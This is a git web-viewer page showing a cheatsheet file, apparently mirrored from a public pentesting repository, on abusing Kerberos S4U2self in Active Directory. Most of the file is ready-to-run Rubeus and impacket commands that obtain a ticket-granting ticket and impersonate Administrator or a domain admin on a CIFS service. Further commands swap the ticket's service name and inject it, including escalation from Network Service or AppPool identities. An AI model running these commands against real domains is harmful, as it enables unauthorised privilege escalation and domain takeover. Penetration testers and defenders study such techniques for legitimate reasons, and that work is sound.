daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

kerberos-s4u.md (2686B)


      1 ---
      2 title: "Kerberos - Service for User Extension"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/kerberos-s4u.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/kerberos-s4u.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Kerberos - Service for User Extension
     12 
     13 * **Service For User To Self** which allows a service to obtain a TGS on behalf of another user
     14 * **Service For User To Proxy** which allows a service to obtain a TGS on behalf of another user on another service
     15 
     16 ## S4U2self - Privilege Escalation
     17 
     18 1. Get a TGT
     19     * Using Unconstrained Delegation
     20     * Using the current machine account: `Rubeus.exe tgtdeleg /nowrap`
     21     * Using credentials: `getTGT.py -dc-ip "$DC_IP" -hashes :"$NT_HASH" "$DOMAIN"/"machine$"`
     22 2. Use that TGT to make a S4U2self request in order to obtain a Service Ticket as domain admin for the machine.
     23 
     24     ```ps1
     25     # Windows
     26     Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001.domain.local" /ticket:"base64ticket"
     27     Rubeus.exe ptt /ticket:"base64ticket"
     28 
     29     Rubeus.exe s4u /self /nowrap /impersonateuser:"Administrator" /altservice:"cifs/srv001" /ticket:"base64ticket" /ptt
     30 
     31     # Linux
     32     export KRB5CCNAME="/path/to/ticket.ccache"
     33     getST.py -self -impersonate "DomainAdmin" -altservice "cifs/machine.domain.local" -k -no-pass -dc-ip "DomainController" "domain.local"/'machine$'
     34     ```
     35 
     36 The "Network Service" account and the AppPool identities can act as the computer account in terms of Active Directory, they are only restrained locally. Therefore it is possible to invoke S4U2self if you run as one of these and request a service ticket for any user (e.g. someone with local admin rights, like DA) to yourself.
     37 
     38 ```ps1
     39 # The Rubeus execution will fail when trying the S4UProxy step, but the ticket generated by S4USelf will be printed.
     40 Rubeus.exe s4u /user:${computerAccount} /msdsspn:cifs/${computerDNS} /impersonateuser:${localAdmin} /ticket:${TGT} /nowrap
     41 # The service name is not included in the TGS ciphered data and can be modified at will.
     42 Rubeus.exe tgssub /ticket:${ticket} /altservice:cifs/${ServerDNSName} /ptt
     43 ```
     44 
     45 ## References
     46 
     47 * [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence)
     48 * [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse)
     49 * [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)